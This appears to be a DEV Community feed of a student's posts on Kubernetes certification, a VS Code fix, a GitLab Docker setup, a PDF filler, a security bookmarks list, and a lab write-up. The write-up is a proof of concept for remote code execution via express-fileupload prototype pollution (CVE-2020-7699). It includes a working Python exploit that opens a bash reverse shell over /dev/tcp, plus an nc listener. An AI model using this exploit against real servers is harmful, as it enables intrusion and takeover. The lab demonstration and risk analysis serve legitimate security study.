DEV Community: boiledsteak

How I passed KCNA ( Kubernetes & Cloud Native Associate)

boiledsteak — Fri, 02 Aug 2024 05:45:02 +0000

TLDR; Have some fundamental webdev knowledge and understanding, some devops experience, buy the Kubernetes and Cloud Native Essentials (LFS250) course, do mock exams

Story Time
Exam Dumps
The Exam

Story Time

I am studying cybersecurity in university and I am interested in pursuing more blue team roles especially in cloud and devops / devsecops. Anyone doing devops would know what Kubernetes is. Based on my limited understanding, its basically the end stage of a CICD pipeline. Your cloud native microservices architecture application with hundreds of containers would be managed (orchestrated) by Kubernetes. If your web application is not at this scale, Docker compose would probably suffice.

Whenever I explain Kubernetes to friends who aren't in IT, I would tell them this. Imagine yourwebsite.com runs in a single box. It can only fit a limited number of visitors before the box is full. So what if you can run yourwebsite.com in 2 boxes? This way you can have more visitors. This is what Kubernetes does. Creates more resources for your website when it needs. Then at the same time, what happens when your 2 box website has low traffic and uses 1 box only? Kubernetes automatically brings down the extra box. This is a huge oversimplification of all the features Kubernetes has but I believe it describes the gist of Kubernetes.

While learning about the different stages of a CICD pipeline, I learnt Kubernetes by poking around with minikube. I was glad to see that it was similar to Docker compose. But once I pulled up the Minikube dashboard, I was bombarded with so much jargon and information. Hmmm instead of diving head first into K8s, I decided to do more research first.

That's where I discovered K8SUG. Apparently there's a meetup group in Singapore (where I live) for K8s. And they have been organising these meetups every month, for a few years already. I found this very interesting because I don't see special interest groups for say metasploit. Why would a certain software have a community that meets up every month? Quite bizzare to me still hahaha. You can ask me more about the meet ups. I mention K8SUG because it was here that I was introduced to Yong Kang. I haven't met him in person but in the K8SUG telegram group, he regularly posts promo codes for the K8 certifications. They are substantial discounts of 40 - 50%.

Damn it's almost as if god was telling me to learn K8 hahaha. So of course, I jumped at the opportunity and paid for the most entry level K8 cert - KCNA. All MCQ made it more attractive too lol. I bought the bundle that includes the Kubernetes and Cloud Native Essentials (LFS250) course as well. This course together with Introduction to Kubernetes (LFS158) course helped me understand K8 architecture much better. I studied the materials like how I studied my modules in school. Alongside, I poked around hosting Gitlab in my local minikube. Typing in commands myself helped but what I found most helpful was being able to cross refer what I was learning, to the Minikube dashboard showing me the data from my Gitlab app

For instance, initially I was a bit confused between ingress and NetworkPolicy. I thought they were the same thing. But being able to see their individual tabs in the minikube dashboard, and being able to explore what objects were under what objects, helped me understand better. Minikube dashboard picuted below.

BTW, self hosted Gitlab on kubernetes is very simple with Helm. I referred to here and here.

So, studying course materials, poking around with minikube, and now the final and probably most crucial bit - doing mock exams aka exam dumps

Exam Dumps

From best to okay
dump 1
dump 2
dump 3
dump 4
dump 5

Some of these require account registration.

There's surely more sources out there, but these are the best ones I found. Some of the questions did appear in my actual KCNA attempt. And of course, the actual KCNA questions had many questions I had not seen before.

In this era of generative AI, I consulted Mr Chatgpt for help too.

The Exam

KCNA includes 1 retake. So essentially you have 2 tries to pass. The passing score is 75%. I studied for about 2 weeks and decided to give it a shot. A bit of an impulse decision, but I treated my first attempt as a gauge to see how the exam would be like. Unfortunately I couldn't pass on my first try, but that's okay. I was relieved to see that the questions weren't crazy difficult, in fact some questions were similar to the ones found in the exam dumps.

What I wasn't expecting however, was how long it takes for the online proctor to check my room. KCNA is an online proctored exam. The proctor will check your room to ensure you're not cheating. You'll also need to have a camera and mic to stream yourself taking the exam. I used my Fujifilm camera and plugged in my mic to my camera. Normally when I do video calls, I would connect my camera and mic to OBS (open broadcasting software). It took me a while to realise it wouldn't work with the lockdown broswer. I had to use my camera with my mic plugged into it, as the direct source. The lockdown browser is quite iffy ... if you book your exam at 5pm, you can connect at 4:30pm to set up everything. Even if the set up over runs 5pm, you still will have the 90mins for the exam.

And just like that... after about 3 - 4 weeks of studying, I passed the exam, and am officially certified as a Kubernetes and Cloud Native Associate :)

let's connect on linkedin!

C++ program can't find file when running in VScode?

boiledsteak — Thu, 15 Feb 2024 09:33:51 +0000

I was doing my school assignment on C++ and I had issues with it while running my program in Visual Studio Code. It took me a stupidly long time to fix, and my google searches and ChatGPT prompts led to no where.

So if anyone faced the same issue as me, I hope this helps!

filename = "messy.txt";
fstream file(filename, fstream::in);
if (!file.fail()) 
{
   cout << "it works \n";
}

Above is a simple C++ code snippet that reads a file named "messy.txt". If it works, the program prints out "it works ".
I had my .cpp and .exe in the same folder ad the messy.txt but the program still said it couldn't find the file.

Then I realised this only happened when I press the "play" or run button in vscode. If I did a manual g++ build command, the program can read the file when run.

Compiler issue then... I looked at launch.json inside the .vscode folder of my project (or the settings button beside the run button), and sure enough the "cwd" value was pointing to my compiler and not my project folder.

Yep so that fixed everything.

TLDR check launch.json "cwd" value

I'd love to include more screenshots but I don't want to reveal my personal machine's file paths and all. Contact me if you need help! See my profile for linkedin. I check quite often :)

How to set up on-prem Gitlab VCS, Gitlab CI/CD, Gitlab Runner, with Docker

boiledsteak — Wed, 15 Nov 2023 03:09:05 +0000

Introduction

Hello! I haven't posted to Dev.to in a while. I have been learning more about Devops, Devsecops, and how I want to navigate my cybersecurity career.

I did some hands-on CI/CD by setting up my own pipeline in my local hosted Virtual Machines. This is sort of my documentation of what I did, a tutorial for others, but more importantly to guide my future self should I want to build something like this again.

To preface, I am a cybersecurity student from Singapore. Apart from school projects, internships, and a couple of side hustles, I do not have true web development/ system adminstration experience in a real-world, large scale production environment. My information may not be 100% accurate; I may be deviating from best practices. Nevertheless, I know that it works. I couldn't find information on this specific permutation of Gitlab and Docker so I hope my sharing would be useful for others who want to build something similar. Let me know if there's anything I could have done better!

Infrastructure

The infrastructure is actually very simple. It's just 2 docker containers running inside an ubuntu VM. You could even run the 2 docker containers inside Windows. Just need to configure slightly differently. The containers are even pulled from Dockerhub. What made this difficult for me was the configuration files. There's small details that I had to dig from several sources to get my pipeline working.

Prerequisites

If running in a VM, you might want to allocate more resources. My Gitlab was quite laggy. I suspect its hardware ... If your Gitlab starts becoming unresponsive, just restart the machine. Avoid pausing the VM too.

Apart from that, you just need Docker.

It's very simple with apt on Ubuntu. Steps here

You could also use Docker Desktop for a GUI process however most guides and documentation online give steps through CLI so I used CLI too.

After installing Docker, you might realise that most Docker commands require sudo. If you do not want to keep typing in sudo:



sudo usermod -aG docker $USER

HOWEVER this opens up a privilege escalation security vulneraibility. This entire write up is for home testing and learning. This is NOT for production.

That's all! On to the actual installation of Gitlab!

Installation

Gitlab has a CE and EE version (community and enterprise). Both are free to download. I used the EE version. Download the Gitlab EE image from Dockerhub



docker pull gitlab/gitlab-ee

In a Gitlab CI/CD pipeline, there are jobs. Different machines can run the jobs in whatever permutation needed for load balancing and scaling. I'm not very clear on this feature of Gitlab CI/CD but I know that to run a job you need a runner. As quoted in Runner documentation,

For security and performance reasons, you should install GitLab Runner on a machine that is separate to the machine that hosts your GitLab instance

I'm not too sure about the specifics, but I just wanted a single runner to run a simple pipeline. Based on this thread, it seems okay for my use case to run both the Gitlab container and the Runner container on the same machine.

So that's what I did.



docker pull gitlab/gitlab-runner

Configuration

Now this is the part where I couldn't find a single source of answers.

From Gitlab documentation, first create a directory for the Gitlab files:



export GITLAB_HOME=/srv/gitlab

Then create a file named docker-compose.yml (actually you can name it anything you want but this step makes some processes more convenient). Docker compose files allow you to write whatever configuration you want before running the container. Multiple containers can be run with one single compose file too. But I'm not too sure about the best practices of this. I believe IAC tools such as Ansible can be used too but for my testing I just used one compose file for one container.

Gitlab container's docker-compose.yml



version: '3.6'
services:
    docker:
        volumes:
            - '/var/run/docker.sock:/var/run/docker.sock'
        tty: true
        stdin_open: true
        image: docker
    web:
        image: 'gitlab/gitlab-ee:latest'
        restart: always
        environment:
            GITLAB_OMNIBUS_CONFIG: |

        ports:
            - '80:80'
            - '443:443'
            - '22:22'
            - '8093:8093'
        volumes:
            - '$GITLAB_HOME/config:/etc/gitlab'
            - '$GITLAB_HOME/logs:/var/log/gitlab'
            - '$GITLAB_HOME/data:/var/opt/gitlab'
        shm_size: '256m'

I don't remember exactly what each config is for but I can roughly explain a few key ones:
volumes this is to make storage persistent
restart I think this is to run the container on boot
ports apart from the common ports, I believe port 8093 is for session_server.
shm_size the Gitlab app is very resource heavy so apparently this increases RAM allocation... I think

Next, in a separate directory, create another docker-compose.yml



version: '3.6'
services:
     gitlab-runner:
          container_name: gitlab-runner
          restart: always
          stdin_open: true
          tty: true
          command: register
          volumes:
                - '/srv/gitlab-runner/config:/etc/gitlab-runner'
                - '/var/run/docker.sock:/var/run/docker.sock'
          image: 'gitlab/gitlab-runner:latest'
          ports:
                - '81:80'
                - '8094:8093'

Then in the Gitlab container directory and the Runner directory:



docker compose up -d

Gitlab takes some time to start. To see the status of the containers:



docker ps

Next, you need to access the Gitlab app's config files. You could try open an editor within the container or do what I did lol. Install the docker extention in VS code.

Navigate to etc/gitlab/gitlb.rb and look for the external_url. For home testing/learning you can use your own IP address. hostname -I. Read here

If everything goes well, open your web browser and enter your IP address. You should see the Gitlab login. The default username should be root while the password can be found in etc/gitlab/initial_root_password. You can change the password through the web GUI afterwards. Once logged in, click click click ~ create your project.

Then there's 2 things you'd want to look at. First, the pipeline editor:

This is where you configure your CI/CD pipeline with whatever building and testing you want.

Second, you'd want to link your runner to your project.

The Gitlab app guides you on the runner registration. Just click new runner registration and follow the steps. Allow the runner to run untagged jobs. This is just for convenience. Next screen shows you the steps to continue.

To run commands in the Runner app:



docker exec -it gitlab-runner bash

With that, you can start testing your CI/CD pipeline script! Perhaps try some devsecops tools. Snyk? Synopsys?

Thank you for reading my post :) I am still learning so please let me know if I can do this better! I might just be spreading misinformation lol

My "hacking" bookmarks / tools

boiledsteak — Tue, 17 Aug 2021 10:07:14 +0000

Hello! These are some websites I have bookmarked while studying. They are definitely not pro hacking tools but should be useful for open-source intelligence (OSINT) and for cybersecurity certifications.

Weak Site 1
Weak Site 2
Computer Laws in Singapore
CVE
OSSA Notes
Whois
NMAP cheatsheet 1
NMAP cheatsheet 2
TCP Port Numbers
Tripwire Reports
Wireshark Filters
Wireshark Filters 2
Snort Rules
Virus Total
Fileless Malware
IP Logger
File Analysis
Explain Shell Code
Check Process
Security Policy Templates
Microsoft Keys
OWASP Risk Rating
Download Windows 10
OSSTMM
Change Windows Password
ARP Poisoning
DROP vs REJECT
NodeJS Hacks
LockHeed Killchain
DirBuster
CyberChef
NIST
Payloads
OWASP Zap
DDE Auto Exploit
EKANS Ransomware
Maze Ransomware
Syntax Highlighter

Weak Site 1

Vulnerable website to perform pen testing
http://www.vulnweb.com/

🚀 back to contents

Weak Site 2

Another Vulnerable website to perform pen testing
https://demo.testfire.net/

🚀 back to contents

Computer Laws in Singapore

Computer laws in Singapore are defined in the Computer Misuse Act
https://sso.agc.gov.sg/Act/CMA1993

🚀 back to contents

CVE

Discover more about reported vulnerabilities and exploits
https://www.cvedetails.com/

🚀 back to contents

OSSA Notes

Notes for a cybersecurity certification, Organisational Systems Security Analyst
https://github.com/exetr/OSSA-Notes#osi-model

🚀 back to contents

Whois

Discover more about a website's domain with this online Whois tool
http://whois.domaintools.com/

🚀 back to contents

NMAP cheatsheet 1

NMAP is a very popular hacking tool. This is one cheatsheet I used to operate NMAP
https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/

🚀 back to contents

NMAP cheatsheet 2

NMAP is a very popular hacking tool. This is one cheatsheet I used to operate NMAP
https://highon.coffee/blog/nmap-cheat-sheet/

🚀 back to contents

TCP Port Numbers

Good for both blue and red teaming or for exams

http://www.meridianoutpost.com/resources/articles/well-known-tcpip-ports.php

🚀 back to contents

Tripwire Reports

Tripwire is a network intrusion detection system (NIDS). Usually used in schools and beginner courses as proof of concept. I doubt it's used in production now. I believe SIEMs such as Splunk and IBM QRadar are more popular.

However if you do use the tripwire application, this might help
https://www-uxsup.csx.cam.ac.uk/pub/doc/redhat/redhat8/rhl-rg-en-8.0/s1-tripwire-twprint.html

🚀 back to contents

Wireshark Filters

Wireshark needs no introduction. This is one cheatsheet I used
https://www.thegeekstuff.com/2012/07/wireshark-filter/

🚀 back to contents

Wireshark Filters 2

Wireshark needs no introduction. This is one cheatsheet I used
https://wiki.wireshark.org/DisplayFilters

🚀 back to contents

Snort Rules

Similar to tripwire, Snort is an intrusion detection system (IDS) that's very outdated and surpassed by modern holistic SIEMs

However it is still used in schools and exams. This might help
https://blog.rapid7.com/2016/12/09/understanding-and-configuring-snort-rules/

🚀 back to contents

VirusTotal

Check any file or link for malware. Not completely foolproof, do your own testing.
Usually used in schools and exams too
https://www.virustotal.com/gui/home

🚀 back to contents

Fileless Malware

Pretty cool stuff
https://github.com/chenerlich/FCL/blob/master/Malwares/Locky.md

🚀 back to contents

IP Logger

Good for phishing attacks. Not really that malicious since any time you connect to a website or server your IP address is shown. This can be mitigated through many ways such as Tor, VPN, dynamic IP address, these are to name of but a few
https://iplogger.org/

🚀 back to contents

File Analysis

Similar to VirusTotal
https://www.joesandbox.com/

🚀 back to contents

Explain Shell Code

Pretty cool
https://explainshell.com/explain?cmd=netstat+-a#

🚀 back to contents

Check Process

Unknown process running on your PC? Check here
https://www.processlibrary.com/en/

🚀 back to contents

Security Policy Templates

Boring stuff
https://www.sans.org/information-security-policy/

🚀 back to contents

Microsoft Keys

I didn't know I had access to this with my school email account lol. Useful for setting up VMs for testing
https://azureforeducation.microsoft.com/devtools

🚀 back to contents

OWASP Risk Rating

Needs no introduction
https://owasp.org/www-community/OWASP_Risk_Rating_Methodology

🚀 back to contents

Download Windows 10

Windows 10 .iso literally on their website free to download
https://www.microsoft.com/en-au/software-download/windows10

🚀 back to contents

OSSTMM

🚀 back to contents

Change Windows Password

Old hack that works on old PCs
https://en.wikipedia.org/wiki/Chntpw

🚀 back to contents

ARP Poisoning

I always forget what's the difference between ARP and DNS poisoning. This website has notes for CEH as well
https://ktflash.gitbooks.io/ceh_v9/content/74_arp_poisoning.html

🚀 back to contents

DROP vs REJECT

I always forget the difference
http://www.chiark.greenend.org.uk/~peterb/network/drop-vs-reject

🚀 back to contents

NodeJS Hacks

Cool stuff for NodeJS
https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet

🚀 back to contents

LockHeed Killchain

LockHeed Martin Cyber Kill Chain. Useful for organisational security I suppose
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

🚀 back to contents

DirBuster

Useful for intrusive penetration testing. I believe this tool is included with Kali
https://tools.kali.org/web-applications/dirbuster

🚀 back to contents

CyberChef

Decrypt (not really) anything
https://gchq.github.io/CyberChef/

🚀 back to contents

NIST

Another cybersecurity framework. Similar to OWASP
https://www.k2io.com/understanding-the-new-nist-sp800-53-guidelines-for-application-security/

🚀 back to contents

Payloads

Probably the most dangerous link here
https://github.com/swisskyrepo/PayloadsAllTheThings

🚀 back to contents

OWASP Zap

I have never tried this. Always wanted to
https://www.google.com/search?q=owasp+xap

🚀 back to contents

DDE Auto Exploit

Cool exploit good with phishing
https://pentestlab.blog/2018/01/16/microsoft-office-dde-attacks/

🚀 back to contents

EKANS Ransomware

Something I've always wanted to read up
https://www.google.com/search?q=ekans+hack

🚀 back to contents

Maze Ransomware

Something I've always wanted to read up
https://www.google.com/search?q=maze+hackers

🚀 back to contents

Syntax Highlighter

Useful for writing reports
https://pinetools.com/syntax-highlighter

🚀 back to contents

Simple Remote Code Execution on EJS Web Applications with express-fileupload

boiledsteak — Sat, 05 Jun 2021 11:18:36 +0000

TLDR with no explanation

As an IT / cybersecurity student, I heavily relied on searching online for guides and forums to help me with my assignments. So this is me giving back to the community 😄

In this post I will explain how to exploit a vulnerability in an older version of a NodeJS library to enable RCE. Many concepts and technologies used will require an

intermmediate level of hands-on knowledge of cybersecurity

I will not explain every term. The entire process is quite simple. If you are unfamiliar with anything, try read it up. Everything mentioned is fairly common.

This Proof of Concept (POC) is a simple example of RCE. Good for demonstrating RCE to an audience without technical knowledge. I doubt it can be used in the wild for penetration testing or for any malicious purposes. In fact the author of the dependency has a glaring warning of this vulnerability at the top of their github repo

This exploit was referenced from: https://blog.p6.is/Real-World-JS-1/
^The author explains why the outdated dependency is vulnerable.

Disclaimer: I am a security student with no professional programming / software engineer experience so my code may not be following best practices...but they work

Abstract
Set Up
- Attacker
- Victim
Launch Attack
Risk
- Likelihood
- Impact

Abstract


CVE Code	CVE-2020-7699
CWE Code	CWE-400
Publish Date	30 July 2020
Attack Type	Remote Code Execution
Vulnerability	JavaScript Prototype Pollution
Cause	Misconfiguration?
Fix	Update Libraries, Proper Network Configuration, Firewalls
Affected Technology	Node, Express, express-fileupload v1.1.10 and earlier , EJS

🚀 back to contents

Set Up

All files needed can be found in my github repository. Higher resolution versions of all images used can be found in there too.

boiledsteak / EJS-Exploit

Remote Code Execution EJS Web Applications using express-fileupload

Attacker

First, set up a Kali Virtual Machine (VM). Ensure all commands are run in bash. Check that Python3 is installed.

Move this file into the kali VM
EJS-RCE-attack.py (can be found in my github repo)



##############################################################
# Run this .py to perform EJS-RCE attack
# referenced from
# https://blog.p6.is/Real-World-JS-1/
# 
# Timothy, 10 November 2020
##############################################################

### imports
import requests

### commands to run on victim machine
cmd = 'bash -c "bash -i &> /dev/tcp/192.168.98.11/8020 0>&1"'

print("Starting Attack...")
### pollute
requests.post('http://192.168.98.10:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

### execute command
requests.get('http://192.168.98.10:8080')
print("Finished!")

Yes I know a docker would have been lighter than a VM but the purpose of this POC is more for demonstration so having a VM makes the process more visual.

Next, modify EJS-RCE-attack.py to fit attacker’s machine address and port. Line 13, change



/dev/tcp/192.168.98.11/8020



/dev/tcp/<attacker’s IP address>/<attacker’s port to listen for connection from victim>

You could leave it at port 8020. Just ensure that no firewall rules are blocking the ports you use.

Modify EJS-RCE-attack.py to fit victim’s machine address and port. Line 17 and line 21. Change http address to victim’s web address.

🚀 back to contents

Victim

This part requires a bit more preparation since you will need to set up an EJS web server. There are many detailed guides online about EJS and how to create a web app with it so I won't detail everything in this post. I'll briefly list the steps needed to get one running.

First, set up an Ubuntu VM. Ensure it can 'talk' to the Kali VM. Install NodeJS and NPM.

Create a directory to contain the webserver code. It should look something like the screenshot below. For now just create the folders. Don't create the files yet. This step is optional but I feel it makes the webserver cleaner and easier to navigate. This step is useful if you choose to expand on my attack scenario for instance, adding a database to the webserver, adding multiple web pages etc...

btw command to print directory tree in windows is



tree /A

Okay first file to create is package.json. Move it to backend as pictured in the directory tree screenshot. (all files can be found in my github repo)



{
  "name": "some-website",
  "version": "1.0.0",
  "description": "",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "ejs": "^3.1.5",
    "express": "^4.17.1",
    "express-fileupload": "^1.1.7-alpha.3"
  }
}

open a terminal in the backend folder and run



npm install

This installs all needed libraries and dependencies including EJS. A "node_modules" folder should appear.

Now, write the server code server.js



// web server code
// website starts here

// imports
const express = require('express');
const fileupload = require("express-fileupload");
const http = require('http')

const app = express();

app.use(fileupload({ parseNested: true }));
// set the view engine to ejs
app.set('view engine', 'ejs');
app.set('views', "../frontend/pages");

app.get('/', (req, res) => {
   res.render('index')
});



// sever starting ...
const server = http.Server(app);
const addr = "192.168.98.10"
const port = 8080;
server.listen(port, addr, () => {
    console.log('Server listening on '+ addr + ' port ' + port);
 });

You'll need to change the "addr" variable in line 24 to match your victim machine's IP address.

Next, create a simple HTML page in frontend/pages. It needs to be an .ejs file. I created a very plain one index.ejs. This is to show that this attack does not require the victim to click anything on the website. The vulnerability lies in an outdated dependency used. No XSS needed. I probably don't need to show the code but here it is lol.



<!DOCTYPE html>
<html>
    <head>
        <title>Some Website</title>
    </head>
    <body>
        <h1>This is some website</h1>
    </body>
</html>

🚀 back to contents

Launch Attack

With everything set up, you can finally launch the attack. First, start the web server from the victim machine. Run npm start in the backend directory where the server.js file is located.

Now on the attacker side start a nc to listen for a connection from the victim.



nc -lvp 8020

Then start the actual exploit



python3 EJS-RCE-attack.py

If everything is done properly, you should be seeing a shell of the victim, on the attacker's terminal. From here you can do all kinds of commands to demonstrate RCE. You could do a simple DOS by restarting the machine with init 6. Or maybe do something even more 'hackerman' by downloading a MSFvenom and opening a metasploit shell.

That's all to the attack. It's actually very simple. As I said at the start, this is just a simple RCE POC to show that misconfiguration can lead to severe vulnerabilities. The victim doesn't even need to click anything on the website and yet the web server can be compromised.

🚀 back to contents

Risk

As defined by the OWASP risk rating methodology, the risk of a vulnerability is measured by its likelihood and impact.

Likelihood

The likelihood of this exploit happening is extremely low because it relies on an outdated version of express-fileupload. The github repo that maintains this dependency even has a security warning about this exploit. Moreover EJS is not usually used in production. React, Angular , Vue, these are some of the more popular javascript frontend frameworks. EJS is used more for learning and development.

Thus I would give this a Low likelihood rating of 1/3

Impact

Since this is a RCE exploit, the impact is very high. RCE can enable all sorts of attacks. Stealing data, denial of service, opening backdoors, lateral movement - these are to name of but a few. Of course there are many effective ways to mitigate the impact of RCE such as firewalls, giving least privelege, port blocking etc. however the impact is still high.

Thus I would give this a High impact rating of 3/3

With low likelihood and high impact, I rate this exploit as a Medium Risk

🚀 back to contents

That's it!

Thank you for reading my first post :) Yes I know it's a very simple and amateur exploit but I hope someone finds it useful. I'm just a student with no real professional experience so some of my information may even be false or misinformed. Please let me know if I missed anything. You can read more about javascript prototype pollution to understand deeper why this vulnerability even exists.

Automatic PDF Form Filler App Part 1: CLI

boiledsteak — Thu, 06 May 2021 14:40:39 +0000

During my year 3 polytechnic internship, I was given an extremely mundane and repetitive task. I won't go into specifics but I knew I could automate the process.

This was my solution; a python app that reads from a .csv file and automatically fills a PDF form with data from the list.
Initially I wrote a simple local app to be run on command line but I further improved it to be a full fledged web app.

This post is part one of two: Command Line Interface app

The app essentially makes use of the pdfjinja library together with a read from .csv function.

Disclaimer: I am a security student with no professional programming/ software engineer experience so my code may not be following best practices...but it works

Prerequisites
- Python
- pdfjinja
- PDFtk
- PDF Form
  - Jinja Templates
The Code
Run!

All files needed can be found in my github repository. Higher resolution versions of all images used can be found in there too.

boiledsteak / auto-pdf-filler

🚀 back to contents

Prerequisites

Python

This post is targeted to novice Python programmers with some experience so pip, virtual environments, dependencies, these are to name of but a few of the many Python concepts needed.

The app is written with Python 3.9.6. You need to have Python installed together with all other libraries and dependencies used. You could create an environment, but I didn’t bother so my dependencies are global hahaha.
And of course, ensure you have pip installed as well.

🚀 back to contents

pdfjinja

Download pdfjinja from pip. This is to enable variable interpolation within PDF files.

pip install pdfjinja

🚀 back to contents

PDFtk

Short for PDF toolkit, the PDFjinja github states that PDFtk is needed. Download the PDFtk app.
Download the PDFtk library from pip as well

pip install pypdftk

🚀 back to contents

PDF Form

And of course, you will need a PDF form to fill. I have included examples in my github repo. The PDF form doesn't actually have to be like an actual form for example, an application form or a particulars form. It can be any document that has fixed fields to fill, in the format of a PDF form.
To elaborate what I meant, the app can be used to create name cards that need to be filled with names from a list. It just depends on how the PDF form is designed.

However to create a PDF form, you need to use Adobe Acrobat Pro. Acrobat Reader does not have the function to create PDF forms. Perhaps there are free alternatives out there but for my case I used Acrobat Pro.

🚀 back to contents

Jinja Templates

After creating the PDF form, you will need to set "variable names" for the fields you want to programmatically fill.

This is I did it with Adobe Acrobat Pro.

Right click on the form field and open its properties. In the "Tooltip" field, insert your desired 'variable' name and enclose it with

{{  }}

So for instance I want to name the variable "name", I would insert

{{name}}

🚀 back to contents

Dataset

Next, you need to create a .csv with the PDF form field names as the column names. I have included examples in my github repo.

🚀 back to contents

The Code

Oh boy here comes the spaghetti. This part is a bit more complicated. You need to modify the code to specify where the files will be read and output to. And to make the input/ output simpler, run the .py relative to where you want the I/O to be.

I developed this app in Windows 10 and ran it with PowerShell. You might run into issues if you're using other operating systems. Contact me if you do, I'll try to help.

# Auto PDF filler
import os
import csv
import sys
import pprint
from pdfjinja import PdfJinja
import shutil
import pathlib
import pypdftk

# glabal variables
datasetPath="ds1.csv"
templatePath="form1.pdf"
group="groupA"



#### <-------[ START OF FUNCTIONS]------->
# create list of dictionaries. One dict woud be one dataset. The whole list carries all data
def lister(csvPath):
    try:
        print("\nreading CSV from\n"+csvPath, file=sys.stderr)
        reader = csv.DictReader(open(csvPath, 'r'))
        theList = []
        for line in reader:
            theList.append(line)

        pprint.pprint(theList)
        return theList

    except Exception as e:
        print(e, file=sys.stderr)

# takes in list and writes PDFs of them
def PDFer(allData, pdfPath, group):
    try:
        print("\nreading PDF from\n"+pdfPath, file=sys.stderr)
        thePDF = PdfJinja(pdfPath)
        print("\ncreating filled PDFs ...")
        # will always overwrite if existing group name folder exists
        shutil.rmtree("./filled/"+group, ignore_errors=True)
        pathlib.Path('./filled/'+group).mkdir(parents=True)
        count = 0
        for x in allData:
            count = count + 1
            pdfout = thePDF(x)
            pdfout.write(open("./filled/"+group+"/filled" +"-"+
                              group+"-"+str(count)+".pdf", "wb"))

        print(str(count)+" files created for "+group)

    except Exception as e:
        print(e, file=sys.stderr)

# Reads PDFs from specified directory and compiles them into single PDF with many pages
def masher(pdfdir, group):
    allPDF = []
    for file in os.listdir(pdfdir):
        allPDF.append(os.path.normpath(os.path.join(pdfdir, file))  )

    try:
        # creates the "compiled" folder. If it already exists, do nothing
        pathlib.Path('./compiled').mkdir(parents=True, exist_ok=True)
        outFilePath = "./compiled/all-forms-"+group+".pdf"
        pypdftk.concat(allPDF, outFilePath)
        print("\n\nCompleted compiling PDFs!")
        print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
        outFile = "all-forms-"+group+".pdf"

        return outFile

    except Exception as e:
        print(e)
        print("\nerror compiling PDFs\n")

#### <-------[END OF FUNCTIONS]------->


# Calling the functions
PDFer(lister(datasetPath), templatePath, group)
outFileName = masher("./filled/"+group, group)
print("output file name: "+outFileName+"\n\n")

First, you need to have the pdf form and the csv dataset in the same directory as the .py app. It should look something like this.

Next, modify the global variables to fit your pdf form and csv dataset file names. You can also change the group name if you're using this app for several groups. For instance filling forms for Client A and Client B.

You could take the fillerz.py file from mu github repo instead.

I know, this is hardcoded and could be better. The web application improves on this!

🚀 back to contents

Run!

With everything set up, you can finally run the app! I used PowerShell on Windows 10. I believe the code can run on Linux too you might just need to use a different library for modifying files and directories. Contact me if you need help with this.

python fillerz.py

You should see the output file being output in a folder called "compiled". I know the app and its process is quite clunky. This was my first attempt to get the job done. See part 2 for a beautified web app solution!

🚀 back to contents

That's it!

Thank you for reading. As mentioned in my disclaimer, I'm still learning, I am definitely no expert but this solved my issue and I hope it helps someone out there :)

DEV Community: boiledsteak

How I passed KCNA ( Kubernetes & Cloud Native Associate)

Contents

Story Time

Exam Dumps

The Exam

C++ program can't find file when running in VScode?

TLDR check launch.json "cwd" value

How to set up on-prem Gitlab VCS, Gitlab CI/CD, Gitlab Runner, with Docker

Introduction

Infrastructure

Prerequisites

Installation

Configuration

My "hacking" bookmarks / tools

Contents

Weak Site 1

Weak Site 2

Computer Laws in Singapore

CVE

OSSA Notes

Whois

NMAP cheatsheet 1

NMAP cheatsheet 2

TCP Port Numbers

Tripwire Reports

Wireshark Filters

Wireshark Filters 2

Snort Rules

VirusTotal

Fileless Malware

IP Logger

File Analysis

Explain Shell Code

Check Process

Security Policy Templates

Microsoft Keys

OWASP Risk Rating

Download Windows 10

OSSTMM

Change Windows Password

ARP Poisoning

DROP vs REJECT

NodeJS Hacks

LockHeed Killchain

DirBuster

CyberChef

NIST

Payloads

OWASP Zap

DDE Auto Exploit

EKANS Ransomware

Maze Ransomware

Syntax Highlighter

Simple Remote Code Execution on EJS Web Applications with express-fileupload

Contents

Abstract

Set Up

boiledsteak / EJS-Exploit

Remote Code Execution EJS Web Applications using express-fileupload

Attacker

Victim

Launch Attack

Risk

Likelihood

Impact

That's it!

Automatic PDF Form Filler App Part 1: CLI

Contents

boiledsteak / auto-pdf-filler

Prerequisites

Python

pdfjinja

PDFtk

PDF Form

Jinja Templates

Dataset

The Code

Run!

That's it!